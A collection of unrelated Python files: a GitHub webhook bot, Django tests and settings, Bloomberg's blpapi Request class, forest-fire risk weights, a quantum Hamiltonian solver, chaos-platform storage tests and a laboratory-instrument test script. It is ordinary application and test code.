# read the GitHub webhook payload
body = await request.read()
# parse the event
event = sansio.Event.from_http(request.headers, body, secret=WEBHOOK_SECRET)
async with aiohttp.ClientSession() as session:
gh = gh_aiohttp.GitHubAPI(session, BOT_NAME, oauth_token=GH_OAUTH_TOKEN)
# call the appropriate callback for the event
await router.dispatch(event, gh)
# HTTP success
return web.Response(status=200)
if __name__ == "__main__":
app = web.Application()
app.add_routes(routes)
port = os.environ.get("PORT")
if port is not None:
port = int(port)
web.run_app(app, port=port)
|
<reponame>sidorenkov-v-a/polls
from rest_framework.reverse import reverse
from rest_framework.test import APIClient
from polls.models import Poll
from .common import create_poll_data
class TestPoll:
url_list = reverse('poll-list')
@property
def url_detail(self, pk=1):
return reverse('poll-detail', kwargs={'pk': pk})
def test_user_get(self, user_client: APIClient):
response = user_client.get(self.url_list)
assert response.status_code == 200, (
'User should be able to get poll list. ',
response.json()
)
def test_admin_get(self, admin_client: APIClient):
response = admin_client.get(self.url_list)
assert response.status_code == 200, (
'Admin user should be able to get poll list. ',
response.json()
)
def test_user_create(self, user_client: APIClient):
assert Poll.objects.count() == 0
data = create_poll_data()
response = user_client.post(self.url_list, data)
assert response.status_code == 401, (
'User should NOT be able to create poll',
response.json()
)
assert Poll.objects.count() == 0
def test_admin_create(self, admin_client: APIClient):
assert Poll.objects.count() == 0
data = create_poll_data()
response = admin_client.post(self.url_list, data)
assert response.status_code == 201, (
'User should be able to create poll',
response.json()
)
assert Poll.objects.count() == 1
poll = Poll.objects.get(pk=1)
assert poll.title == data['title']
assert poll.description == data['description']
assert poll.date_start.strftime('%Y-%m-%d') == data['date_start']
assert poll.date_end.strftime('%Y-%m-%d') == data['date_end']
def test_user_update(self, user_client: APIClient):
data = create_poll_data()
Poll.objects.create(**data)
assert Poll.objects.count() == 1
response = user_client.patch(self.url_detail, {'title': 'New title'})
assert response.status_code == 401, (
'User should NOT be able to update poll',
response.json()
)
response = user_client.put(self.url_detail, data)
assert response.status_code == 401, (
'User should NOT be able to update poll',
response.json()
)
def test_admin_update(self, admin_client: APIClient):
data = create_poll_data()
Poll.objects.create(**data)
assert Poll.objects.count() == 1
response = admin_client.patch(self.url_detail, {'title': 'New title'})
assert response.status_code == 200, (
'Admin should be able to update poll',
response.json()
)
response = admin_client.put(self.url_detail, data)
assert response.status_code == 200, (
'Admin should be able to update poll',
response.json()
)
def test_time(self, admin_client: APIClient):
from datetime import datetime, timedelta
date_start = datetime.today()
date_end = datetime.today() - timedelta(days=1)
data = create_poll_data(date_start=date_start, date_end=date_end)
response = admin_client.post(self.url_list, data)
assert response.status_code == 400, (
'Date end should be greater than date start',
response.json()
)
data = create_poll_data()
Poll.objects.create(**data)
response = admin_client.patch(
self.url_detail,
{'date_start': date_start, 'date_end': date_end}
)
assert response.status_code == 400, (
'Date end should be greater than date start',
response.json()
)
response = admin_client.patch(
self.url_detail,
{'date_end': date_end}
)
assert response.status_code == 400, (
'Date end should be greater than date start',
response.json()
)
new_date_start = date_start - timedelta(days=1)
response = admin_client.patch(
self.url_detail,
{'date_start': new_date_start}
)
db_date_start = Poll.objects.get(pk=1).date_start.strftime('%Y-%m-%d')
date_start = date_start.strftime('%Y-%m-%d')
assert db_date_start == date_start, (
'Change start date is NOT allowed.',
)
|
# -*- coding: utf-8 -*-
from configurations import Configuration
from django.contrib.messages import constants as messages
from kaio import Options
from kaio.mixins import CachesMixin, DatabasesMixin, LogsMixin, PathsMixin, SecurityMixin, DebugMixin, WhiteNoiseMixin
opts = Options()
class Base(CachesMixin, DatabasesMixin, PathsMixin, LogsMixin, SecurityMixin, DebugMixin,
WhiteNoiseMixin, Configuration):
"""
Project settings for development and production.
"""
DEBUG = opts.get('DEBUG', True)
BASE_DIR = opts.get('APP_ROOT', None)
APP_SLUG = opts.get('APP_SLUG', 'tenerife_japon_status')
SITE_ID = 1
SECRET_KEY = opts.get('SECRET_KEY', 'key')
USE_I18N = True
USE_L10N = True
USE_TZ = True
LANGUAGE_CODE = 'es'
TIME_ZONE = 'Europe/Madrid'
ROOT_URLCONF = 'main.urls'
WSGI_APPLICATION = 'main.wsgi.application'
INSTALLED_APPS = [
# django
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
# apps
'main',
'toilet',
'stats',
# 3rd parties
'raven.contrib.django.raven_compat',
'django_extensions',
'django_yubin',
'kaio',
'logentry_admin',
'channels',
'timedeltatemplatefilter',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
# SecurityMiddleware options
SECURE_BROWSER_XSS_FILTER = True
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
# insert additional TEMPLATE_DIRS here
],
'OPTIONS': {
'context_processors': [
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.debug",
"django.template.context_processors.i18n",
"django.template.context_processors.media",
"django.template.context_processors.static",
"django.contrib.messages.context_processors.messages",
"django.template.context_processors.tz",
'django.template.context_processors.request',
'constance.context_processors.config',
],
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
]
},
},
]
if not DEBUG:
TEMPLATES[0]['OPTIONS']['loaders'] = [
('django.template.loaders.cached.Loader', TEMPLATES[0]['OPTIONS']['loaders']),
]
# Bootstrap 3 alerts integration with Django messages
MESSAGE_TAGS = {
messages.ERROR: 'danger',
}
# Channels
if DEBUG:
CHANNEL_LAYERS = {
"default": {
"BACKEND": "asgiref.inmemory.ChannelLayer",
"ROUTING": "toilet.routing.channel_routing",
},
}
else:
CHANNEL_LAYERS = {
"default": {
"BACKEND": "asgi_redis.RedisChannelLayer",
"CONFIG": {
"hosts": ["redis://redis:6379/10"],
},
"ROUTING": "toilet.routing.channel_routing",
},
}
# Web Sockets
WEB_SOCKET_HOST = opts.get('WEB_SOCKET_HOST', '')
|
<filename>src/blpapi/request.py
# request.py
"""Defines a request which can be sent for a service.
This file defines a class 'Request' which represents a request sent through the
Session.
"""
import weakref
from .element import Element
from .exception import _ExceptionUtil
from . import internals
from .chandle import CHandle
class Request(CHandle):
"""A single request to a single service.
:class:`Request` objects are created using :meth:`Service.createRequest()`
or :meth:`Service.createAuthorizationRequest()`. They are used with
:meth:`Session.sendRequest()` or
:meth:`Session.sendAuthorizationRequest()`.
The :class:`Request` object contains the parameters for a single request to
a single service. Once a :class:`Request` has been created its fields can
be populated directly using the functions provided by :class:`Element` or
using the :class:`Element` interface on the :class:`Element` returned by
:meth:`asElement()`.
The schema for the :class:`Request` can be queried using the
:class:`Element` interface.
"""
def __init__(self, handle, sessions):
super(Request, self).__init__(handle, internals.blpapi_Request_destroy)
self.__handle = handle
self.__sessions = sessions
self.__element = None
def __str__(self):
"""x.__str__() <==> str(x)
Return a string representation of this Request. Call of str(request) is
equivalent to request.toString() called with default parameters.
"""
return self.toString()
def set(self, name, value):
"""Equivalent to :meth:`asElement().setElement(name, value)
<Element.setElement>`."""
self.asElement().setElement(name, value)
def append(self, name, value):
"""Equivalent to :meth:`getElement(name).appendValue(value)
<Element.appendValue>`."""
return self.getElement(name).appendValue(value)
def asElement(self):
"""
Returns:
Element: The content of this :class:`Request` as an
:class:`Element`.
"""
el = None
if self.__element:
el = self.__element()
if el is None:
el = Element(internals.blpapi_Request_elements(self.__handle),
self)
self.__element = weakref.ref(el)
return el
def getElement(self, name):
"""Equivalent to :meth:`asElement().getElement(name)
<Element.getElement>`."""
return self.asElement().getElement(name)
def getRequestId(self):
"""
Return the request's id if one exists, otherwise return ``None``.
If there are issues with this request, the request id
can be reported to Bloomberg for troubleshooting purposes.
Note that request id is not the same as correlation
id and should not be used for correlation purposes.
Returns:
str: The request id of the request.
"""
rc, requestId = internals.blpapi_Request_getRequestId(self.__handle)
_ExceptionUtil.raiseOnError(rc)
return requestId
def toString(self, level=0, spacesPerLevel=4):
"""Equivalent to :meth:`asElement().toString(level, spacesPerLevel)
<Element.toString>`."""
return self.asElement().toString(level, spacesPerLevel)
def _sessions(self):
"""Return session(s) this Request related to. For internal use."""
return self.__sessions
__copyright__ = """
Copyright 2012. Bloomberg Finance L.P.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to
deal in the Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
sell copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions: The above
copyright notice and this permission notice shall be included in all copies
or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.
"""
|
class Config:
JAC_RAISE1 = 0.017 #Prognozētā vidējā gaisa temperatūra
JAC_RAISE2 = 0.016 #Prognozētais vidējais nokrišņu daudzums
JAC_RAISE3 = 0.013 #Karsto dienu skaits
JAC_RAISE4 = 0.017 #Meža tips
JAC_RAISE5 = 0.006 #Vēsturisko ugunsgrēku skaits
JAC_RAISE6 = 0.002 #Attālums no dzelzceļa
JAC_RAISE7 = 0.011 #Attālums no kūdras ieguves vietas
JAC_RAISE8 = 0.008 #Attālums no autoceļa
JAC_RAISE9 = 0.008 #Attālums no ugunsnovērošanas torņa
JAC_SPREAD10 = 0.013 #Prognozētā vidējā gaisa temperatūra
JAC_SPREAD11 = 0.012 #Prognozētais vidējais nokrišņu daudzums
JAC_SPREAD12 = 0.010 #Karsto dienu skaits
JAC_SPREAD13 = 0.012 #Prognozētais gada vidējais vēja ātrums
JAC_SPREAD14 = 0.013 #Meža tips
JAC_SPREAD15 = 0.012 #Nogāžu virziens
JAC_SPREAD16 = 0.007 #Nogāžu slīpums
JAC_SPREAD17 = 0.007 #Attālums no autoceļa
JAC_SPREAD18 = 0.001 #Attālums no ūdensņemšanas vietas
JAC_SPREAD19 = 0.002 #Attālums no ugunsdzēsības stacijas
JAC_SPREAD20 = 0.007 #Attālums no stigas
JAC_SPREAD21 = 0.002 #Attālums no mineralizētās joslas
AHP_RAISE1 = 0.125 #Prognozētā vidējā gaisa temperatūra
AHP_RAISE2 = 0.188 #Prognozētais vidējais nokrišņu daudzums
AHP_RAISE3 = 0.064 #Karsto dienu skaits
AHP_RAISE4 = 0.353 #Meža tips
AHP_RAISE5 = 0.048 #Vēsturisko ugunsgrēku skaits
AHP_RAISE6 = 0.077 #Attālums no dzelzceļa
AHP_RAISE7 = 0.090 #Attālums no kūdras ieguves vietas
AHP_RAISE8 = 0.023 #Attālums no autoceļa
AHP_RAISE9 = 0.032 #Attālums no ugunsnovērošanas torņa
AHP_SPREAD10 = 0.134 #Prognozētā vidējā gaisa temperatūra
AHP_SPREAD11 = 0.184 #Prognozētais vidējais nokrišņu daudzums
AHP_SPREAD12 = 0.095 #Karsto dienu skaits
AHP_SPREAD13 = 0.033 #Prognozētais gada vidējais vēja ātrums
AHP_SPREAD14 = 0.311 #Meža tips
AHP_SPREAD15 = 0.018 #Nogāžu virziens
AHP_SPREAD16 = 0.012 #Nogāžu slīpums
AHP_SPREAD17 = 0.049 #Attālums no autoceļa
AHP_SPREAD18 = 0.041 #Attālums no ūdensņemšanas vietas
AHP_SPREAD19 = 0.026 #Attālums no ugunsdzēsības stacijas
AHP_SPREAD20 = 0.032 #Attālums no stigas
AHP_SPREAD21 = 0.065 #Attālums no mineralizētās joslas
MLC_RAISE1 = 7.211 #Prognozētā vidējā gaisa temperatūra
MLC_RAISE2 = 7.893 #Prognozētais vidējais nokrišņu daudzums
MLC_RAISE3 = 6.453 #Karsto dienu skaits
MLC_RAISE4 = 7.487 #Meža tips
MLC_RAISE5 = 1.236 #Vēsturisko ugunsgrēku skaits
MLC_RAISE6 = 0.612 #Attālums no dzelzceļa
MLC_RAISE7 = 4.480 #Attālums no kūdras ieguves vietas
MLC_RAISE8 = 4.611 #Attālums no autoceļa
MLC_RAISE9 = 6.016 #Attālums no ugunsnovērošanas torņa
MLC_SPREAD10 = 4.827 #Prognozētā vidējā gaisa temperatūra
MLC_SPREAD11 = 5.307 #Prognozētais vidējais nokrišņu daudzums
MLC_SPREAD12 = 4.262 #Karsto dienu skaits
MLC_SPREAD13 = 4.994 #Prognozētais gada vidējais vēja ātrums
MLC_SPREAD14 = 5.000 #Meža tips
MLC_SPREAD15 = 4.971 #Nogāžu virziens
MLC_SPREAD16 = 1.706 #Nogāžu slīpums
MLC_SPREAD17 = 5.770 #Attālums no autoceļa
MLC_SPREAD18 = 0.093 #Attālums no ūdensņemšanas vietas
MLC_SPREAD19 = 1.180 #Attālums no ugunsdzēsības stacijas
MLC_SPREAD20 = 6.989 #Attālums no stigas
MLC_SPREAD21 = 0.901 #Attālums no mineralizētās joslas
|
"""Methods used to setup the Hamiltonian of the system."""
import numpy as np
from basis import msg
from basis.potential import Potential
class Hamiltonian(object):
"""Represents the Hamliltonian for a 1D quantum potential.
Args:
potcfg (str): path to the potential configuration file.
n_basis (int): The number of basis functions to use in the solution.
xi (float, optional): The left most edge of the potential. If
not specified then it is assumed to be the left most edge of the
potential as defined in `potcfg'.
xf (float, optional): The right most edge of the potential. If
not specified then it is assumed to be the left most edge of the
potential as defined in `potcfg'.
Attributes:
pot (:obj:`Potential`): A Potential object that
represents the potential for the 1D quantum system.
eigenvals (list): The energy eigenvalues for the sysetm.
eigenvecs (list): The eigenvectors for the system.
ham (np.ndarray): An array of the hamiltonian.
domain (list): The region over which the potential is defined.
Examples:
>>> from basis.hamiltonian import Hamiltonian
>>> h = hamiltonian("sho.cfg", 10)
>>> energy = h.eigenvals()
>>> eigenvecs = h.eigenves()
"""
def __init__(self, potcfg, n_basis, xi = None, xf = None):
self.pot = Potential(potcfg)
if xi == None:
xi = self._find_xi()
if xf == None:
xf = self._find_xf()
self.domain = [xi,xf]
self.ham = None
self._construct_ham(n_basis)
self.eigenvals, self.eigenvecs = np.linalg.eigh(self.ham)
# def __call__(self, value):
# """Returns the desired row entries for the hamiltonian.
def _find_xi(self):
"""Finds the left most edge of the potential.
"""
xi = None
for key in self.pot.regions:
if xi == None:
xi = min(list(key))
else:
xi = min([xi,min(list(key))])
return xi
def _find_xf(self):
"""Finds the right most edge of the potential.
"""
xf = None
for key in self.pot.regions:
if xf == None:
xf = max(list(key))
else:
xf = max([xf,max(list(key))])
return xf
def _construct_ham(self, n_basis):
"""Constructs the hamiltonian matrix for the system.
Args:
n_basis (int): The number of basis functions to be used
in the expansion.
"""
ham = []
xr, width_b = self._find_xrs()
for n in range(n_basis):
temp = []
for m in range(n_basis):
if n == m:
hnm = self._hnn((n+1), xr, width_b)
en = (np.pi**2)*((n+1)**2)/(abs(self.domain[1] -self.domain[0])**2)
else:
hnm = self._hnm((n+1),(m+1),xr,width_b)
en = 0
temp.append(en+hnm)
ham.append(temp)
self.ham = np.array(ham)
def _find_xrs(self):
"""Finds the mid points of the potential bariers.
Returns:
tuple of lists: The list of the barriers in the well and a list
of the widths of the barriers in the well.
"""
xr = []
width_b = []
# We need to find the best number of divisions for the system
# to make sure we aren't missing any bumps. For the average
# user something like 0.1 will likely suffice, however if the
# user does something special in their potential then we may
# need to use a smaller iterative size.
temp = []
for key in self.pot.params:
if key != '__builtins__' and key != 'operator':
temp.append(abs(self.pot.params[key]))
if min(temp) > 1:
divs = 0.1
else:
divs = min(temp)/10.0
xs = np.arange(self.domain[0],self.domain[1]+divs,divs)
# Now we need to scan through the potential to find the bumps.
Vt = [self.pot(xs[0])]
for x in xs:
if self.pot(x) > Vt[0]:
Vt.append(x)
xr.append(np.mean(Vt[1:]))
width_b.append(abs(Vt[-1]-Vt[1]))
Vt = [self.pot(x),x]
elif self.pot(x) < Vt[0]:
Vt.append(x)
xr.append(np.mean(Vt[1:]))
width_b.append(abs(Vt[-1]-Vt[1]))
Vt = [self.pot(x),x]
else:
Vt.append(x)
if len(Vt) > 2:
xr.append(np.mean(Vt[1:]))
width_b.append(abs(Vt[-1]-Vt[1]))
return xr, width_b
def _hnn(self,n, xr, b):
"""The value of the integral over the basis functions for each x in
xr for the diagonals of the hamiltonian.
Args:
n (int): The column and row number for the matrix element.
xr (list of float): The midpoints of the potential barriers.
b (list of float): The width of the potential barriers.
Returns:
float: The value of the sum of all hnm from the paper.
"""
hnm = 0
L = abs(self.domain[1] - self.domain[0])
for i_x in range(len(xr)):
spb = xr[i_x] + b[i_x]/2.
smb = xr[i_x] - b[i_x]/2.
hnm += self.pot(xr[i_x])*(self._fnn(spb,n)-self._fnn(smb,n))
return hnm
def _hnm(self, n, m, xr, b):
"""The value of the integral over the basis functions for each x in
xr for the off diagonals of the hamiltonian.
Args:
n (int): The row number for the matrix element.
m (int): The column number for the matrix element.
xr (list of float): The midpoints of the potential barriers.
b (float): The width of the potential barrier.
Returns:
float: The value of the sum of all hnm from the paper.
"""
hnm = 0
L = abs(self.domain[1] - self.domain[0])
for x_i in range(len(xr)):
spb = xr[x_i] + b[x_i]/2.
smb = xr[x_i] - b[x_i]/2.
hnm += self.pot(xr[x_i])*(self._fnm(spb,n,m)-self._fnm(smb,n,m))
return hnm
def _fnn(self,x,n):
L = abs(self.domain[1] - self.domain[0])
result = x/L-np.sin(2*np.pi*n*x/L)/(2*np.pi*n)
return result
def _fnm(self,x,n,m):
L = abs(self.domain[1] - self.domain[0])
sin1 = np.sin((m-n)*np.pi*x/L)/(np.pi*(m-n))
sin2 = np.sin((m+n)*np.pi*x/L)/(np.pi*(m+n))
result = sin1-sin2
return result
|
import uuid
from chaosplt_experiment.storage import ExperimentStorage, ExecutionStorage
from chaosplt_experiment.storage.model import Experiment, Execution
from chaosplt_relational_storage.db import orm_session
def test_create_experiment(experiment_storage: ExperimentStorage):
with orm_session() as session:
e = Experiment.create(
user_id=uuid.uuid4(),
org_id=uuid.uuid4(),
workspace_id=uuid.uuid4(),
experiment={"title": "a tale of one platform"},
session=session
)
session.commit()
assert uuid.UUID(hex=e.id.hex) == e.id
def test_load_experiment(experiment_storage: ExperimentStorage):
with orm_session() as session:
e = Experiment.create(
user_id=uuid.uuid4(),
org_id=uuid.uuid4(),
workspace_id=uuid.uuid4(),
experiment={"title": "a tale of one platform"},
session=session
)
session.commit()
fetched_exp = Experiment.load(e.id, session)
assert e == fetched_exp
def test_load_experiment_by_user(experiment_storage: ExperimentStorage):
with orm_session() as session:
user_id = uuid.uuid4()
e = Experiment.create(
user_id=user_id,
org_id=uuid.uuid4(),
workspace_id=uuid.uuid4(),
experiment={"title": "a tale of one platform"},
session=session
)
session.commit()
fetched_exp = Experiment.load_by_user(user_id, e.id, session)
assert fetched_exp == e
fetched_exp = Experiment.load_by_user(uuid.uuid4(), e.id, session)
assert fetched_exp is None
def test_load_experiment_list_by_user(experiment_storage: ExperimentStorage):
with orm_session() as session:
user_id = uuid.uuid4()
e = Experiment.create(
user_id=user_id,
org_id=uuid.uuid4(),
workspace_id=uuid.uuid4(),
experiment={"title": "a tale of one platform"},
session=session
)
session.commit()
fetched_exps = Experiment.list_all_by_user(user_id, session)
assert fetched_exps == [e]
fetched_exps = Experiment.list_all_by_user(uuid.uuid4(), session)
assert fetched_exps == []
def test_load_experiment_by_workspace(experiment_storage: ExperimentStorage):
with orm_session() as session:
workspace_id = uuid.uuid4()
e = Experiment.create(
user_id=uuid.uuid4(),
org_id=uuid.uuid4(),
workspace_id=workspace_id,
experiment={"title": "a tale of one platform"},
session=session
)
session.commit()
fetched_exps = Experiment.load_by_workspace(workspace_id, session)
assert fetched_exps == [e]
fetched_exp = Experiment.load_by_workspace(uuid.uuid4(), session)
assert fetched_exp == []
def test_delete_experiment(experiment_storage: ExperimentStorage):
with orm_session() as session:
e = Experiment.create(
user_id=uuid.uuid4(),
org_id=uuid.uuid4(),
workspace_id=uuid.uuid4(),
experiment={"title": "a tale of one platform"},
session=session
)
session.commit()
fetched_exp = Experiment.load(e.id, session)
assert e == fetched_exp
Experiment.delete(e.id, session)
fetched_exp = Experiment.load(e.id, session)
assert fetched_exp == None
def test_create_execution(experiment_storage: ExperimentStorage,
execution_storage: ExecutionStorage):
with orm_session() as session:
e = Experiment.create(
user_id=uuid.uuid4(),
org_id=uuid.uuid4(),
workspace_id=uuid.uuid4(),
experiment={"title": "a tale of one platform"},
session=session
)
session.flush()
e = Execution.create(
user_id=uuid.uuid4(),
org_id=uuid.uuid4(),
workspace_id=uuid.uuid4(),
experiment_id=e.id,
execution={},
session=session
)
session.commit()
assert uuid.UUID(hex=e.id.hex) == e.id
def test_load_execution(experiment_storage: ExperimentStorage,
execution_storage: ExecutionStorage):
with orm_session() as session:
e = Experiment.create(
user_id=uuid.uuid4(),
org_id=uuid.uuid4(),
workspace_id=uuid.uuid4(),
experiment={"title": "a tale of one platform"},
session=session
)
session.flush()
e = Execution.create(
user_id=uuid.uuid4(),
org_id=uuid.uuid4(),
workspace_id=uuid.uuid4(),
experiment_id=e.id,
execution={},
session=session
)
session.commit()
fetched_exp = Execution.load(e.id, session)
assert e == fetched_exp
def test_load_execution_by_user(experiment_storage: ExperimentStorage,
execution_storage: ExecutionStorage):
with orm_session() as session:
user_id = uuid.uuid4()
e = Experiment.create(
user_id=uuid.uuid4(),
org_id=uuid.uuid4(),
workspace_id=uuid.uuid4(),
experiment={"title": "a tale of one platform"},
session=session
)
session.flush()
e = Execution.create(
user_id=user_id,
org_id=uuid.uuid4(),
workspace_id=uuid.uuid4(),
experiment_id=e.id,
execution={},
session=session
)
session.commit()
fetched_exs = Execution.load_by_user(user_id, session)
assert fetched_exs == [e]
fetched_exs = Execution.load_by_user(uuid.uuid4(), session)
assert fetched_exs == []
def test_delete_execution(experiment_storage: ExperimentStorage,
execution_storage: ExecutionStorage):
with orm_session() as session:
e = Experiment.create(
user_id=uuid.uuid4(),
org_id=uuid.uuid4(),
workspace_id=uuid.uuid4(),
experiment={"title": "a tale of one platform"},
session=session
)
session.flush()
e = Execution.create(
user_id=uuid.uuid4(),
org_id=uuid.uuid4(),
workspace_id=uuid.uuid4(),
experiment_id=e.id,
execution={},
session=session
)
session.commit()
fetched_exp = Execution.load(e.id, session)
assert e == fetched_exp
Execution.delete(e.id, session)
fetched_ex = Execution.load(e.id, session)
assert fetched_ex == None
|
<gh_stars>1-10
import sys, logging, threading
from typing import List
import time
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
import configparser
config = configparser.ConfigParser()
config.read('config.ini')
# IMPORTANT Path to IHC_PMS_Lib dlls
sys.path.append("/home/for/dev/IHC_PMS_Lib_1.9.2.0/bin")
from ihcWrappers import *
def main():
print("### IHC_PMS_Lib Test Script ###")
print("Configuration:")
print("ODTC: " + config['IHC']['ODTC'])
print("SCILA: " + config['IHC']['SCILA'])
print("PMS version: " + PmsWrapper.GetAssemblyVerion())
pms = PmsWrapper()
# pms.IpAddressIndex(1) #e.g. Linux VPN (multihomed adapter ip index)
nics = pms.GetSupportedNICs() #default wired ethernet
#nics = pms.GetSupportedNICs(NetworkInterfaceTypesWrapper.Vpn) # Windows VPN
if len(nics) == 0:
nics = pms.GetSupportedNICs(NetworkInterfaceTypesWrapper.WiredEthernet + NetworkInterfaceTypesWrapper.VirtualEthernet)
if len(nics) > 1:
nics = pms.GetSupportedNICs(NetworkInterfaceTypesWrapper.Vpn)
for nic in nics:
print("Network interface: " + nic.Id + " " + nic.Name + " " + nic.Description)
# alt static
#nics = PmsWrapper.SupportedNICs(NetworkInterfaceTypesWrapper.WiredEthernet)
if len(nics) == 1:
eru = pms.StartEventReceiver(nics[0].Id) # Explicit Id
else:
# manually choose an Id
eru = pms.StartEventReceiver(nics[1].Id)
print("EventReceiver Uri: " + eru)
'''SCILA'''
if config['IHC']['SCILA'] == "True":
print("SCILA Dll Version: " + ScilaWrapper.GetAssemblyVersion())
deviceIp = "192.168.1.128" # predefined scila ip
# Finder
frScilas = ScilaFinderWrapper.SearchDevices()
if len(frScilas) == 0:
print("No SCILA found")
for val in frScilas:
print("Finder result: " + val.Name + " " + str(val.WsdlUri))
# Gather device info before Create()
status = PmsWrapper.GetStatus(val.IPv4Address)
print(val.Name + " state: " + status.State)
print(val.Name + " locked: " + status.Locked)
(r, di) = PmsWrapper.GetDeviceIdentification(val.IPv4Address)
assert r.ReturnCode == 1
print(val.Name + " pre-connect GetDeviceIdentification: " + di.DeviceName + " " + di.Wsdl + " " + di.DeviceFirmwareVersion)
status = PmsWrapper.GetStatus(deviceIp)
(r, di) = PmsWrapper.GetDeviceIdentification(deviceIp)
assert r.ReturnCode == 1
# Download logs and latest trace file
print("Start log/trace download...")
error = DownloadScilaLogTraces(ip=deviceIp, path="/home/for/dev/logDownload/" + di.DeviceName, traceFileCount=1, logs=True)
assert(error is None)
print("log/trace download finished")
# Create device
try:
scila = pms.Create("http://" + deviceIp + "/scila.wsdl")
except Exception as ex:
if (ex.Message) == "Invalid lockId.":
scila = pms.Create("http://" + deviceIp + "/scila.wsdl", "myLockId")
else:
raise
# Register Callback(s)
scila.RegisterStatusEventCallback(OnStatusEvent)
print("Device Name: " + scila.DeviceName)
print("Current LockId: " + str(scila.LockId))
di = GetDeviceIdentification(scila)
assert di.DeviceName == scila.DeviceName
s = GetStatus(scila)
assert s.State != "InError"
# SiLA Commands
rv = scila.Reset()
assert rv.Success == True
# if rv.Success == False:
# print("SCILA Reset error: " + rv.Message)
# print("Exit")
# return
s = GetStatus(scila)
assert s.State == "Standby"
# Lock device
scila.LockId = "myLockId"
rv = scila.LockDevice()
assert rv.Success == True
# Test lock
s = GetStatus(scila)
assert s.Locked == True
scila.LockId = None # Set Wrong lockId
rv = scila.GetConfiguration()
assert rv.Success == False
# Unlock device
scila.LockId = "myLockId"
rv = scila.UnlockDevice()
assert rv.Success == True
s = GetStatus(scila)
assert s.Locked == False
# GetConfiguration
rv = scila.GetConfiguration()
assert rv.Success == True
print(rv.ResponseData.LogLevel)
print(rv.ResponseData.NetworkConfig)
print(rv.ResponseData.SoapCompression)
print(rv.ResponseData.SysDateTime)
print(rv.ResponseData.UseDeviceClassDateTime)
# Configure Device example: import Network-Settings from file
cx = ScilaConfigXmlWrapper()
cx.ImportNetworkConfigXml("dhcp.xml")
print(cx.GetParamsXml())
# SetConfiguration
rv = scila.SetConfiguration(cx.GetParamsXml())
assert rv.Success == True
# Initialize
rv = scila.Initialize()
assert rv.Success == True
s = GetStatus(scila)
assert s.State == "Idle"
# Delay 1s
rv = scila.Delay(1)
assert rv.Success == True
# GetAutoBoostCo2
rv = scila.GetAutoBoostCo2()
assert rv.Success == True
print(rv.ResponseData.AutoBoostCO2)
print(rv.ResponseData.BoostState)
# GetCo2FlowStatus
rv = scila.GetCo2FlowStatus()
assert rv.Success == True
print(rv.ResponseData.CO2FlowStatus)
# GetDoorStatus
rv = scila.GetDoorStatus()
assert rv.Success == True
print(rv.ResponseData.Drawer1)
print(rv.ResponseData.Drawer2)
print(rv.ResponseData.Drawer3)
print(rv.ResponseData.Drawer4)
# GetLiquidLevel
rv = scila.GetLiquidLevel()
assert rv.Success == True
print(rv.ResponseData.LiquidLevel)
# GetParameters
rv = scila.GetParameters()
assert rv.Success == True
print(rv.ResponseData.Position)
print(rv.ResponseData.WorkstationMode)
# New Parameters config example
px = ScilaParamsXmlWrapper()
px.Position = 1
px.WorkstationMode = False
print(px.GetParamsXml())
# SetParameters
rv = scila.SetParameters(px.GetParamsXml())
assert rv.Success == True
# GetTemperature
rv = scila.GetTemperature()
assert rv.Success == True
print(rv.ResponseData.CurrentTemperature)
print(rv.ResponseData.TargetTemperature)
print(rv.ResponseData.TemperatureControl)
# GetValveStatus
rv = scila.GetValveStatus()
assert rv.Success == True
print(rv.ResponseData.Gas_Boost)
print(rv.ResponseData.Gas_Normal)
print(rv.ResponseData.H2O)
# Open-/CloseDoor
rv = scila.PrepareForInput(4)
assert rv.Success == True
rv = scila.OpenDoor()
assert rv.Success == True
# invoke StatusEvent: multiple doors
rv = scila.PrepareForInput(3)
assert rv.Success == True
rv = scila.OpenDoor()
assert rv.Success == False
# rv = scila.RetrieveByPositionId(2) #TODO Fix CommandException
# assert rv.Success == True
# SetAutoBoostCo2
rv = scila.SetAutoBoostCo2(True)
assert rv.Success == True
# SetCo2NormalFlow
rv = scila.SetCo2NormalFlow(True)
assert rv.Success == True
# SetTemperature
rv = scila.SetTemperature(37, True)
assert rv.Success == True
rv = scila.SetTemperature(None, True)
assert rv.Success == True
rv = scila.SetTemperature(None, None)
assert rv.Success == True
rv = scila.SetTemperature(37, False)
assert rv.Success == True
# rv = scila.StoreAtPosition(2) #TODO Fix CommandException
# assert rv.Success == True
# Disconnect
print(scila.DeviceName + " dispose")
scila.Dispose()
'''ODTC'''
if config['IHC']['ODTC'] == "True":
print("ODTC Dll Version: " + OdtcWrapper.GetAssemblyVersion())
deviceIp = "192.168.1.195" # predefined odtc ip
(r, di) = PmsWrapper.GetDeviceIdentification(deviceIp)
assert r.ReturnCode == 1
status = PmsWrapper.GetStatus(deviceIp)
print(di.DeviceName + " state: " + status.State)
